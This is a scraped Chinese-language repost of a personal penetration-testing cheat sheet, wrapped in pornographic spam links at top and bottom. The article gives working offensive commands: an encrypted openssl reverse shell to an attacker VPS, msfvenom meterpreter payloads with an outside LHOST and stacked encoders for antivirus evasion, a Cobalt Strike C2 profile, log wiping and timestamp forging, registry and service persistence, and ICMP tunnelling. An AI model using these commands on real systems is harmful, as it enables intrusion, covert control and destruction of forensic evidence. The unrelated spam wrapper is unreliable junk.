在线观看www成人影院-在线观看www日本免费网站-在线观看www视频-在线观看操-欧美18在线-欧美1级

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評(píng)論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會(huì)員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

個(gè)人滲透技巧匯總(避坑)筆記

jf_Fo0qk3ln ? 來(lái)源:菜鳥學(xué)信安 ? 2023-03-30 09:35 ? 次閱讀

前言

首先我們拿到一個(gè)站不能心急,凡事三思而行 跑得太快是會(huì)滑倒的當(dāng)我們獲得目標(biāo)的時(shí)候不要急著用掃描器,這樣會(huì)不僅會(huì)影響服務(wù)器的速度還會(huì)在對(duì)方的服務(wù)器日志生成大量的記錄,什么站能掃什么站不能掃,心里一定要有點(diǎn)b數(shù),不然可能等待的就是不一樣的結(jié)果了。如果手工測(cè)試無(wú)果后再用代理手法掃描網(wǎng)站,必要的時(shí)候設(shè)置二級(jí)代理。當(dāng)然!!!!什么站能掃什么站不能掃,心里一定要有點(diǎn)數(shù)!小提示:在使用proxychains的時(shí)候,程序或者終端選項(xiàng)盡量不要設(shè)置任何協(xié)議的代理,否則可能會(huì)打亂這個(gè)代理回路出現(xiàn)網(wǎng)絡(luò)錯(cuò)誤。54fae188-ce97-11ed-bfe3-dac502259ad0.png

淺藍(lán)的滲透測(cè)試導(dǎo)圖以及小工具

一個(gè)導(dǎo)圖,可以做一個(gè)大致的方向參考,跟著方向逐一測(cè)試,期間也可以鞏固基礎(chǔ)。https://github.com/iSafeBlue/Mind-Map/releases550b9b68-ce97-11ed-bfe3-dac502259ad0.png這里再附一個(gè)滲透工具包,幫助新手熟悉滲透測(cè)試:https://github.com/lz520520/railgunAWVS + Nessus docker
# 拉取鏡像
  docker pull leishianquan/awvs-nessus:v1
  # 啟動(dòng)
  docker run -it -d -p 13443:3443 -p 8834:8834 leishianquan/awvs-nessus:v1
  # 查看容器
  docker ps –a
  # 啟動(dòng)容器
  docker start container-id
  # 進(jìn)入容器
  docker exec –it container-id /bin/bash
  
  # 進(jìn)入容器后,啟動(dòng)nessus
  /etc/init.d/nessusd start
  
  # 訪問(wèn)掃描器地址和賬號(hào)密碼
  Nessus:
  https://127.0.0.1:8834/#/
  account:leishi/leishianquan


  Awvs13:
  https://127.0.0.1:13443/
  account:admin@admin.com/Admin123

ZERO

首先進(jìn)行信息收集你獲得的信息越多對(duì)自己后面的滲透就越有幫助,whois,旁站子域,服務(wù)器操作系統(tǒng)版本,web中間件以及waf與cdn,通過(guò)google與github看看是否存在已知的漏洞這樣有助于快速的獲得權(quán)限,端口掃描并判斷服務(wù)漏洞加以利用,目錄的fuzz,弱口令的fuzz,google hack 進(jìn)一步探測(cè)網(wǎng)站的信息后臺(tái)以及敏感信息,撒旦天眼也是不錯(cuò)的信息工具。

一.時(shí)刻關(guān)注返回的數(shù)據(jù)包

漏洞有很多種類型都需要滲透方認(rèn)證仔細(xì)的對(duì)每個(gè)數(shù)據(jù)包已經(jīng)url進(jìn)行驗(yàn)證,要相信所有的努力都是為成功而付出的。如XSS,XSRF,sql注入,代碼執(zhí)行,命令執(zhí)行,越權(quán)訪問(wèn),目錄讀取,任意文件讀取,下載,文件包含,遠(yuǎn)程命令執(zhí)行,弱口令,上傳,編輯器漏洞,暴力破解等
  1. 驗(yàn)證碼與郵箱以及token的返回泄露,以及后臺(tái)為校驗(yàn)從而可刪除的參數(shù)
    截獲的敏感數(shù)據(jù)參數(shù),學(xué)會(huì)在多個(gè)數(shù)據(jù)包反復(fù)嘗試。
    從某個(gè)成功請(qǐng)求中捕獲數(shù)據(jù)包觀察cookie或者token是否存在規(guī)律或加密。
    通過(guò)修改返回的狀態(tài)值,觸發(fā)js進(jìn)行邏輯漏洞的滲透。
    token的key參數(shù)解密構(gòu)建獲取真實(shí)user密鑰,可拼接、規(guī)律、時(shí)間戳……
下面是網(wǎng)絡(luò)上的滲透三字訣
進(jìn)谷歌  找注入
沒(méi)注入  就旁注
沒(méi)旁注  用0day
沒(méi)0day  猜目錄
沒(méi)目錄  就嗅探
爆賬戶  找后臺(tái)
傳小馬  放大馬
拿權(quán)限  掛頁(yè)面
放暗鏈  清數(shù)據(jù)
滲透企業(yè)實(shí)戰(zhàn)版
搞企業(yè)  先掃描
掃描器  商業(yè)好
默密碼  都知道
社工庫(kù)  找一找
郵箱號(hào)  先列好
九頭蛇  跑一跑
搞不定  放大招
找插件  挖一挖
發(fā)郵件  憑偽造
沒(méi)郵箱  搞網(wǎng)站
二級(jí)域  皆可爆
老漏洞  沒(méi)修好
新漏洞  刷一票
干研發(fā)  Git 找
源代碼  全都要
C D N  可以跳
防火墻  可以撬
堡壘機(jī)  可以秒
云防護(hù)  可以秒
是企業(yè)  沒(méi)有哪家搞不了!
二.FUZZ的藝術(shù)https://www.freebuf.com/vuls/221129.html

三.WEBBYPASS

linux反彈 shell:
1)VPS 上生成 ssl 證書的公鑰/私鑰對(duì):
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
2)VPS 監(jiān)聽反彈 shell:
openssl s_server -quiet -key key.pem -cert cert.pem -port 80
3)目標(biāo)上回連 shell:
mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | openssl s_client -quiet -connect :1024 > /tmp/s; rm /tmp/s


VPS 上已獲取加密的 getshell 了。
winodws桌面:TeamViewerQS單文件windows下載文件;certutil -urlcache -split -fhttps://raw.githubusercontent.com/backlion/demo/master/CVE-2017-11882-v1.pytest.py腳本反彈內(nèi)網(wǎng):reGeorghttps://github.com/sensepost/reGeorg1.將 tunnel腳本(aspx | ashx | jsp | php)上傳到Web服務(wù)器,訪問(wèn)顯示“Georg says, ‘All seems fine’“,表示腳本運(yùn)行正常。2.在攻擊者機(jī)器上,啟動(dòng)reGeorgSocksProxy.py,監(jiān)聽9999端口,看到 Checking if Georg is ready,確認(rèn)正常運(yùn)行,這個(gè)時(shí)候就可以吧目標(biāo)機(jī)作為跳板了。waf:中國(guó)蟻劍客戶端,冰蝎與內(nèi)存馬,反復(fù)嘗試使用編碼字節(jié)繞過(guò)

四.提權(quán)與權(quán)限維持

首先通過(guò)檢查目標(biāo)服務(wù)器的進(jìn)程與可利用服務(wù)以及漏洞ssl加密payload
###生成證書并寫入文件
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -keyout rsaprivate.key -out servercertificate.crt


cat  rsaprivate.key servercertificate.crt >my.pem
###生成payload
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=39.97.167.211 LPORT=6667 --platform windows -a x86 HandLerSSLCert= ./my.pem StagerVerifySSLCert=true -s 42 --smallest -e x86/shikata_ga_nai -i 9 -f raw| msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw | msfvenom --platform windows -a x86 -e x86/call4_dword_xor -i 6 -b "x00x0ax0d" -f raw > /home/xskali/kali/Shecodject/output/shellcode.raw


###監(jiān)聽
msfconsole -q -x 'use exploit/multi/handler;set ExitOnSession false;set PAYLOAD windows/meterpreter/reverse_winhttps;set LHOST 192.168.129.128; set LPORT 4445; set HandlerSslCert /home/xskali/kali/Shecodject/output/my.pem;set StagerVerifySSLCert true; set SessionCommunicationTimeout 600 ;set autorunscript post/windows/manage/migrate; run -j -Z'
老牌工具Cobaltstrike+Profiles
上云和隱藏流量參考free教程https://www.freebuf.com/articles/network/262445.html1.利用keytool生成自己的免費(fèi)證書(可在kali上生成)
keytool -genkey -alias tryblog -keyalg RSA -validity 36500 -keystore tryblog.store
2.C2.profile文件編輯
set sample_name "tryblog POS Malware";
 
set sleeptime "5000"; # use a ~30s delay between callbacks
set jitter    "10";    # throw in a 10% jitter
 
set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0";
 
#設(shè)置證書,注意以下內(nèi)容得和你之前生成的證書一樣
https-certificate {
    set CN       "TRY"; 
    set O        "TRY";   
    set C        "TRY";
    set L        "TRY";
    set OU       "TRY";  
    set ST       "TRY";
    set validity "365";
}
#設(shè)置,修改成你的證書名稱和證書密碼
code-signer{
    set keystore "tryblog.store";
    set password "tryblog";
    set alias "tryblog";
}
 
#指定DNS beacon不用的時(shí)候指定到IP地址
set dns_idle "8.8.4.4";
 
#每個(gè)單獨(dú)DNS請(qǐng)求前強(qiáng)制睡眠時(shí)間
set dns_sleep "0";
 
#通過(guò)DNS上載數(shù)據(jù)時(shí)主機(jī)名的最大長(zhǎng)度[0-255]
set maxdns    "235";
 
http-post {
    set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php /windowsxp/updcheck.php /hello/flash.php";
 
    client {
        header "Accept" "text/plain";
        header "Accept-Language" "en-us";
        header "Accept-Encoding" "text/plain";
        header "Content-Type" "application/x-www-form-urltrytryd";
 
        id {
            netbios;
            parameter "id";
        }
 
        output {
            base64;
            prepend "&op=1&id=vxeykS&ui=Josh @ PC&wv=11&gr=backoff&bv=1.55&data=";
            print;
        }
    }
 
    server {
        output {
            print;
        }
    }
}
 
http-get {
    set uri "/updates";
 
    client {
        metadata {
            netbiosu;
            prepend "user=";
            header "Cookie";
        }
    }
 
    server {
        header "Content-Type" "text/plain";
 
        output {
            base64;
            print;
        }
    }
}
3.驗(yàn)證c2lint,啟動(dòng)服務(wù)端,載入漢化運(yùn)行
./c2lint C2.profile
./teamserver ip:prot ./C2.profile 
java -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC  -jar cobaltstrike.jar
免殺遠(yuǎn)控整理(來(lái)自Tide團(tuán)隊(duì))
551a9e10-ce97-11ed-bfe3-dac502259ad0.jpg 項(xiàng)目地址:https://github.com/QChiLan/BypassAntiVirus
windows下的免殺生成(順序從上到下依次混淆)
如果需要捆綁正常軟件運(yùn)行使用shellter,如不能過(guò)免殺,再分步測(cè)試以下操作。cs文件編碼混淆用AVIATOR生成。測(cè)試可以再用python再當(dāng)前目錄打開一個(gè)web服務(wù)器:
python3 -m http.server 8080
1.Lime-Crypter 注入線程2.DeepSeaOBFuscator 封裝3.CryptoObfuscator 混淆4.https 證書修改5.base64prionx 混淆6.themida 加殼7.https 證書修改8.viper(在線msf處理平臺(tái)可加特征和簽名很方便)*通用免殺法(簡(jiǎn)單概括就是1.修改特征碼2.花指令免殺3.加殼免殺。552adaaa-ce97-11ed-bfe3-dac502259ad0.png也可以通過(guò)把軟件分塊用殺軟重復(fù)掃描找到特征碼進(jìn)行修改,當(dāng)然也可以通過(guò)加載器的形式更加靠譜但是需要落地多個(gè)文件,c#文件自己封裝推薦avator+掩蓋日可以過(guò)火絨
Veil
Veil是一種免殺生成工具,用于生成繞過(guò)常見防病毒解決方案的metasploit有效負(fù)載。
一些payload加料的技巧
1、通過(guò)ssl與加殼加密palyoad(免殺)2、通過(guò)dns或套cdn傳輸:https://mp.weixin.qq.com/s/fdGnJxDjh1Orb2V76EX8tQ
windows
Exploit批量掃描:Windows-Exploit-Suggester漏洞模塊:https://github.com/SecWiki/windows-kernel-exploitsBITS免殺提權(quán):https://github.com/ohpe/juicy-potato
linux
搜尋配置文件中的明文密碼、sudo濫用Exploit批量掃描:linux-exploit-suggester、linux-exploit-suggester-2漏洞模塊:https://github.com/SecWiki/linux-kernel-exploits

五、日志清理(細(xì)心的安全工程師會(huì)更改位置并定時(shí)備份后滲透主要還是靠細(xì)心)

windows
遇見不能刪除的先停止相關(guān)服務(wù):net stop “task scheduler”系統(tǒng)日志推薦使用工具:clearlog.exemsf清理:clearev ,run event_manager -c
防火墻日志路徑:%systemroot%system32logfiles
IIS日志路徑:%systemroot%system32logfles
windows系統(tǒng)日志:%systemroot%system32config
Scheduler服務(wù)日志:%systemroot%schedlgu.txt
日志在注冊(cè)表的鍵:HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesEventlog
系統(tǒng)日志:%SystemRoot%System32WinevtLogsSystem.evtx
安全日志:%SystemRoot%System32WinevtLogsSecurity.evtx
應(yīng)用程序日志:%SystemRoot%System32WinevtLogsApplication.evtx
linux(檢索根目錄以及上級(jí)目錄是否存在備份)
1.清空當(dāng)前用戶歷史命令并刪除相關(guān)文件:
history -c
echo “”> /root/.bash_history
echo “”> /var/run/utmp
2.清除部分日志:echo “”> /var/log/secure;全刪除如不能刪除使用echo依次覆蓋:rm -f -r /var/log/*;
/var/log/boot.log:錄了系統(tǒng)在引導(dǎo)過(guò)程中發(fā)生的事件,就是Linux系統(tǒng)開機(jī)自檢過(guò)程顯示的信息


/var/log/lastlog :記錄最后一次用戶成功登陸的時(shí)間、登陸IP等信息


/var/log/messages :記錄Linux操作系統(tǒng)常見的系統(tǒng)和服務(wù)錯(cuò)誤信息


/var/log/secure :Linux系統(tǒng)安全日志,記錄用戶和工作組變壞情況、用戶登陸認(rèn)證情況


/var/log/btmp :記錄Linux登陸失敗的用戶、時(shí)間以及遠(yuǎn)程IP地址


/var/log/syslog:只記錄警告信息,常常是系統(tǒng)出問(wèn)題的信息,使用lastlog查看


/var/log/wtmp:該日志文件永久記錄每個(gè)用戶登錄、注銷及系統(tǒng)的啟動(dòng)、停機(jī)的事件,使用last命令查看


/var/log/maillog 與郵件相關(guān)的日志信息


/var/log/cron 與定時(shí)任務(wù)相關(guān)的日志信息


/var/log/spooler 與UUCP和news設(shè)備相關(guān)的日志信息


/var/log/auth.log 系統(tǒng)授權(quán)信息,包括用戶登錄和使用的權(quán)限機(jī)制等 (debian)


/var/run/utmp:該日志文件記錄有關(guān)當(dāng)前登錄的每個(gè)用戶的信息。如 who、w、users、finger等就需要訪問(wèn)這個(gè)文件
3.更新test.txt的時(shí)間和test2.txt時(shí)間戳相同:touch -r test.txt test2.txt;設(shè)定時(shí)間戳:touch -t 201605171210.20 test.txt
web容器路徑
數(shù)據(jù)庫(kù)通過(guò)查詢配置文件定位日志(如mysql的配置文件文件my.inf,tomcat的配置文件tomcat-user.xml)winodws
apcheC:Program FilesApache Software FoundationApache2.2htdocs"
tomact:CProgram Filestomcatlog
nignx: CProgram Filesnginx-1.14.2logs
linux
tomcat:/usr/local/tomcat/logs/
apche:/usr/local/apache/logs/access_log
nignx:/var/log/httpd/error_log  rm -f -r /var/log/*
七、后滲透與流量隱匿
frsocks+protoplex+流量重定向?qū)崿F(xiàn)端口復(fù)用
protoplex是一個(gè)協(xié)議復(fù)用的工具,比如以下命令可將本地9999端口的流量根據(jù)協(xié)議類型轉(zhuǎn)到本地的2333和80端口。用于繞過(guò)云主機(jī)的nsg安全規(guī)則。
./frsocks -sockstype fsocks -listen 2333  //創(chuàng)建本地監(jiān)聽
./protoplex --socks5 192.168.154.130:2333 --http 127.0.0.1:80 -b 192.168.154.130:9999  //端口分流,根據(jù)協(xié)議類型轉(zhuǎn)到本地的2333和80端口
重定向命令linux:
sudo iptables -t nat -A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 9999
windows:
netsh interface portproxy add v4tov4 listenport=80 listen address=192.168.154.129 connectport=9999 connectaddress=192.168.154.129
netsh interface portproxy show all //查看轉(zhuǎn)發(fā)規(guī)則
netsh interface portproxy reset   //清除所有轉(zhuǎn)發(fā)規(guī)則
將 IP 流量封裝進(jìn) IMCP 的 ping 數(shù)據(jù)包進(jìn)行傳輸
工具如下1、icmptunnelhttps://github.com/jamesbarlow/icmptunnel2、ptunnel:http://www.cs.uit.no/~daniels/PingTunnel/3、icmpsh:https://github.com/inquisb/icmpsh4、Powershell-ICMPhttps://github.com/api0cradle/Powershell-ICMP5、復(fù)雜的網(wǎng)絡(luò)環(huán)境可以使用EarchWorm(ew)實(shí)現(xiàn)多級(jí)代理訪問(wèn)目標(biāo)主機(jī)
后滲透
ps:合理利用后滲透插件可以剩下很多時(shí)間,但是要注意痕跡清理。插件有謝公子和梼杌完整版比較常用,Cobaltstrike推薦插件:謝公子、梼杌、Z1-AggressorScripts、ladong5536471e-ce97-11ed-bfe3-dac502259ad0.png詳情參考這個(gè)https://blog.csdn.net/qq_33020901/article/details/98357659添加開機(jī)自啟
reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v "Keyname" /t REG_SZ /d "C:UsersKingXL1.exe" /f 


reg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun /v "test" /t REG_SZ /d "C:UsersKingXL1.exe" /f
sc create "server power" binpath= "C:WindowsSystem32config.exe"
//設(shè)置服務(wù)的描述字符串
sc description "server power" "description" 
//設(shè)置這個(gè)服務(wù)為自動(dòng)啟動(dòng)
sc config "server power" start= auto 
net start "server power" 啟動(dòng)服務(wù)

八、 一個(gè)便捷的HACK瀏覽器(上火狐開發(fā)者版本也不錯(cuò))

這里個(gè)人做一個(gè)備份有需求的自行g(shù)oogle,解釋一下英文的插件功能。5542bc74-ce97-11ed-bfe3-dac502259ad0.png555257d8-ce97-11ed-bfe3-dac502259ad0.png5564710c-ce97-11ed-bfe3-dac502259ad0.pngAjax Interceptor:可以自定義ajax的json返回值,前端測(cè)試用。Anti-HoneyPot:紅隊(duì)用,可以檢查網(wǎng)頁(yè)中的蜜罐鏈接并提示。ApiRequest.io Ajax Capture Debugging Tool:這個(gè)是神器!!強(qiáng)推,可以測(cè)試網(wǎng)頁(yè)中任何的ajax請(qǐng)求包括跨站ajax請(qǐng)求重放,官網(wǎng)提供了只30天的請(qǐng)求歷史記錄記得保存重要請(qǐng)求。Decentraleyes:可以攔截一些cdn和本地的文件跟蹤器APK Downloader for Google Play Store :免google框架在線下載應(yīng)用商店的app。Buster Captcha Solver for Humans:過(guò)goole驗(yàn)證碼,有時(shí)候識(shí)別會(huì)比較慢。Easy WebRTC Block:干掉webrtc的ip回顯,避免泄露真實(shí)ipIP Whois & Flags Chrome & Websites Rating:自動(dòng)在后臺(tái)測(cè)試當(dāng)前網(wǎng)站ip的歸屬地然后以小圖標(biāo)的形式返回給前臺(tái)非常便捷,點(diǎn)擊進(jìn)去還可以看到cdn以及whois信息。NoScript: 慎用,此插件可以強(qiáng)力的攔截網(wǎng)頁(yè)上的追蹤器來(lái)保護(hù)用戶的隱私與真實(shí)信息,但是會(huì)造成許多網(wǎng)站打開異常。Identify web technologies :可以幫你分析當(dāng)前網(wǎng)站所使用的網(wǎng)絡(luò)技術(shù)與框架。Shodan:網(wǎng)絡(luò)搜索引擎同fofa與鐘馗之眼,互聯(lián)網(wǎng)設(shè)備大殺器Picture-in-Picture Extension:畫中畫懸浮窗口看視頻SourceDetector:可以再后臺(tái)默默的掃描是否有源代碼泄露HackTools:方便懶人使用點(diǎn)擊擴(kuò)展可快速?gòu)?fù)制sql,xss,反彈shell。

	

審核編輯 :李倩


聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問(wèn)題,請(qǐng)聯(lián)系本站處理。 舉報(bào)投訴
  • 互聯(lián)網(wǎng)
    +關(guān)注

    關(guān)注

    54

    文章

    11176

    瀏覽量

    103540
  • 操作系統(tǒng)
    +關(guān)注

    關(guān)注

    37

    文章

    6859

    瀏覽量

    123498
  • 滲透
    +關(guān)注

    關(guān)注

    0

    文章

    20

    瀏覽量

    6294

原文標(biāo)題:干貨|個(gè)人滲透技巧匯總(避坑)筆記

文章出處:【微信號(hào):菜鳥學(xué)信安,微信公眾號(hào):菜鳥學(xué)信安】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。

收藏 人收藏

    評(píng)論

    相關(guān)推薦

    R128點(diǎn)屏踩筆記

    本文所整理的R128點(diǎn)屏踩筆記均是在參考以下應(yīng)用開發(fā)案例進(jìn)行屏幕適配時(shí)遇到的實(shí)際開發(fā)問(wèn)題,涵蓋了屏幕花屏、屏幕白屏、LVGL顯示顏色錯(cuò)誤等常見問(wèn)題的解決方法。
    的頭像 發(fā)表于 12-03 10:17 ?1409次閱讀
    R128點(diǎn)屏踩<b class='flag-5'>坑</b><b class='flag-5'>筆記</b>

    基于STM32的USB程序開發(fā)筆記 匯總

    忙了一下午終于有時(shí)間整理了,基于STM32的USB程序開發(fā)筆記匯總,需要的親們點(diǎn)擊鏈接閱讀哈!{:4_95:}基于STM32的USB程序開發(fā)筆記(一)https://bbs.elecfans.com
    發(fā)表于 03-20 16:08

    個(gè)人的學(xué)習(xí)資料匯總

    本帖最后由 nyjingle 于 2020-8-11 10:09 編輯 【個(gè)人的學(xué)習(xí)資料匯總貼】MYMINIEYE:60天FPGA工程師入門就業(yè)項(xiàng)目實(shí)戰(zhàn)特訓(xùn)營(yíng)(視頻+開發(fā)板)http
    發(fā)表于 08-07 11:16

    STM32基礎(chǔ)知識(shí)入門指南

    一STM32入門踩筆記——(2)無(wú)敵的我、又回來(lái)了。。。。又是元?dú)鉂M滿的一天、又是踩崩潰的一天。昨晚上連夜把跑馬燈寄存器版本搞定了。這里需要聲明一下。哈哈、首先說(shuō)我不是水軍或者托兒哈!!我
    發(fā)表于 08-03 07:30

    安裝VSCODE個(gè)人筆記

    個(gè)人筆記安裝VSCODE。安裝CYGWIN以及里面的一套東西。安裝OPENOCD。安裝STM32CUBE以及一套庫(kù)的下載。幫助: CYGWIN
    發(fā)表于 08-24 07:40

    分享一些嵌入式系統(tǒng)編程中內(nèi)存操作相關(guān)的指南

    在嵌入式系統(tǒng)的編程中,內(nèi)存操作是我們常用到的,但往往也是易錯(cuò)的地方,怎么避免呢,今天給大家分享一些相關(guān)的指南。數(shù)據(jù)指針...
    發(fā)表于 12-17 07:18

    STM32+CubeMX開發(fā)工程筆記匯總,錯(cuò)過(guò)絕對(duì)后悔

    STM32+CubeMX開發(fā)工程筆記匯總,錯(cuò)過(guò)絕對(duì)后悔
    發(fā)表于 12-21 06:00

    設(shè)計(jì)干貨:PCB板漏孔、漏槽在設(shè)計(jì)端如何

    ,產(chǎn)品無(wú)法使用。請(qǐng)看下圖;如何:PCB設(shè)計(jì)文件各層都有各層的作用,鉆孔、槽孔必須放置在鉆孔層,不能認(rèn)為設(shè)計(jì)有就能制造。問(wèn)題2:Altium設(shè)計(jì)的文件過(guò)孔0 D碼;問(wèn)題描述:漏過(guò)孔開路,不導(dǎo)電。原因分析
    發(fā)表于 09-23 10:52

    PCB板漏孔、漏槽怎么辦?看工程師“SOP”

    。理論上此操作沒(méi)有多大問(wèn)題,但是在制造過(guò)程中打孔只是用鉆孔層,因此容易忽略其他層存在槽孔,導(dǎo)致此槽孔漏做打孔,產(chǎn)品無(wú)法使用。請(qǐng)看下圖。如何:PCB設(shè)計(jì)文件各層都有各層的作用,鉆孔、槽孔必須放置在
    發(fā)表于 03-01 10:36

    機(jī)器學(xué)習(xí)的個(gè)人學(xué)習(xí)筆記

    本文檔的主要內(nèi)容詳細(xì)介紹的是機(jī)器學(xué)習(xí)的個(gè)人學(xué)習(xí)筆記免費(fèi)下載。
    發(fā)表于 03-01 09:28 ?22次下載
    機(jī)器學(xué)習(xí)的<b class='flag-5'>個(gè)人</b>學(xué)習(xí)<b class='flag-5'>筆記</b>

    PCB設(shè)計(jì)指南

    本文就重點(diǎn)講解PCB設(shè)計(jì)指南,99%的PCB工程師容易忽略的!點(diǎn)進(jìn)來(lái) 大家在PCB設(shè)計(jì)中都踩過(guò)哪些
    的頭像 發(fā)表于 03-20 18:20 ?1206次閱讀
    PCB設(shè)計(jì)<b class='flag-5'>避</b><b class='flag-5'>坑</b>指南

    個(gè)人滲透技巧匯總

    前言 首先我們拿到一個(gè)站不能心急,凡事三思而行 跑得太快是會(huì)滑倒的 當(dāng)我們獲得目標(biāo)的時(shí)候不要急著用掃描器,這樣會(huì)不僅會(huì)影響服務(wù)器的速度還會(huì)在對(duì)方的服務(wù)器日志生成大量的記錄,什么站能掃什么站不能掃,心里一定要有點(diǎn)b數(shù),不然可能等待的就是不一樣的結(jié)果了。 如果手工測(cè)試無(wú)果后再用代理手法掃描網(wǎng)站,必要的時(shí)候設(shè)置二級(jí)代理。 當(dāng)然!!!!什么站能掃什么站不能掃,心里一定要有點(diǎn)數(shù)! 小提示:在使用proxychains的時(shí)候,程序或者
    的頭像 發(fā)表于 05-26 15:13 ?647次閱讀
    <b class='flag-5'>個(gè)人</b><b class='flag-5'>滲透</b>技巧<b class='flag-5'>匯總</b>

    【6月28日|直播】遇見KeysightCare——貴重儀器安全指南

    現(xiàn)場(chǎng)直播時(shí)間: 2023年6月28日 下午1415 ? 立即報(bào)名 01 直播簡(jiǎn)介 什么?!價(jià)值百萬(wàn)的儀器壞了?怎么就壞了呢?如果你有這樣的困惑,快來(lái)參加直播,聽聽專家詳細(xì)介紹如何“”,保證高端
    的頭像 發(fā)表于 06-14 07:40 ?498次閱讀
    【6月28日|直播】遇見KeysightCare——貴重儀器安全<b class='flag-5'>避</b><b class='flag-5'>坑</b>指南

    指南】電容耐壓降額裕量不合理導(dǎo)致電容頻繁被擊穿

    指南】電容耐壓降額裕量不合理導(dǎo)致電容頻繁被擊穿
    的頭像 發(fā)表于 11-23 09:04 ?2139次閱讀
    【<b class='flag-5'>避</b><b class='flag-5'>坑</b>指南】電容耐壓降額裕量不合理導(dǎo)致電容頻繁被擊穿

    電源設(shè)計(jì)(下)

    。在上一期《電源設(shè)計(jì)(上)》中,我們討論了電源設(shè)計(jì)中的電源功率、穩(wěn)定性、紋波控制以及尖峰和浪涌的問(wèn)題,并結(jié)合實(shí)際案例提出了相應(yīng)的應(yīng)對(duì)措施。接下來(lái),我們將繼續(xù)探索
    的頭像 發(fā)表于 12-16 11:37 ?302次閱讀
    電源設(shè)計(jì)<b class='flag-5'>避</b><b class='flag-5'>坑</b>(下)
    主站蜘蛛池模板: 久久狠狠躁免费观看| 三级国产在线观看| 日本a级片免费| 男人扒开美女尿口无遮挡图片| 欧美黄色片网站| 丁香花小说| 久久久久久久综合色一本| 天天摸天天做天天爽水多| 一区二区中文字幕在线观看| 国产伦精一区二区三区| 天堂网在线www资源网| 狠狠丁香激情久久综合| 人人人人凹人人爽人人澡| 人成xxxwww免费视频| 免费一级毛片私人影院a行| 色婷婷影视| 性色在线播放| 美女被强插| 亚洲三级免费| 扒开双腿猛进入jk校视频| ⅹxxxx68日本老师hd| sihu影院永久在线影院| 久久久久久人精品免费费看| 天天爽夜夜爽精品免费| a级毛片网站| 国产成人91青青草原精品 | 成人午夜毛片| 偷偷狠狠的日日2020| 亚洲情a成黄在线观看| 国产精品视频你懂的| 久久综合九色婷婷97| 久久永久视频| hs网站免费| 亚洲午夜网未来影院| 中国特黄一级片| 在线看3344免费视频| 欧美jizz大又粗| 中文字幕三级久久久久久| 亚洲无线视频| 毛片美女| 不卡一区二区在线观看|